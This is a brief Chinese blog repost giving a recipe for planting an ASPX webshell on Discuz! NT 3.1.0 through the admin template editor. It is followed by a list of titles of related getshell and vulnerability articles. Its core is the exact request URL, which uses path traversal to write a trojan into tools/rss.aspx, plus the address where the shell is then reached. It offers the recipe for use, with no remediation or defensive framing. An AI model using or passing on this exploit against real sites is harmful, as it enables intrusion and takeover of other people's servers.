Discuz! NT 3.1.0 后台拿webshell

简介:

 

1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx

?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。
2、写入aspx木马后,访问http://127.0.0.1/tools/rss.aspx就可以了。













本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/581501,如需转载请自行联系原作者

 
相关文章
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
323 1
|
SQL 安全 关系型数据库
phpMyAdmin后台Getshell总结
phpMyAdmin后台Getshell总结
460 1
|
Web App开发 XML 安全
DedeCMS存在文件包含漏洞导致后台getshell(CVE-2023-2928)
DedeCMS存在文件包含漏洞导致后台getshell,攻击者可通过该漏洞获取目标服务器控制权限,进行深度利用。
628 1
|
开发框架 安全 关系型数据库
常见的CMS后台getshell姿势总结
常见的CMS后台getshell姿势总结
378 0
|
SQL PHP 数据安全/隐私保护
PHP审计-后台绕过登录
PHP审计-后台绕过登录
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
弹性计算 关系型数据库 MySQL
安装 PHPWind 程序 | 学习笔记
快速学习安装 PHPWind 程序
安装 PHPWind 程序 | 学习笔记
|
SQL 安全 关系型数据库
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
588 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(上)
|
SQL 存储 安全
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)
【WEB安全】PHPMyAdmin后台GetShell姿势总结
480 0
【WEB安全】PHPMyAdmin后台GetShell姿势总结(下)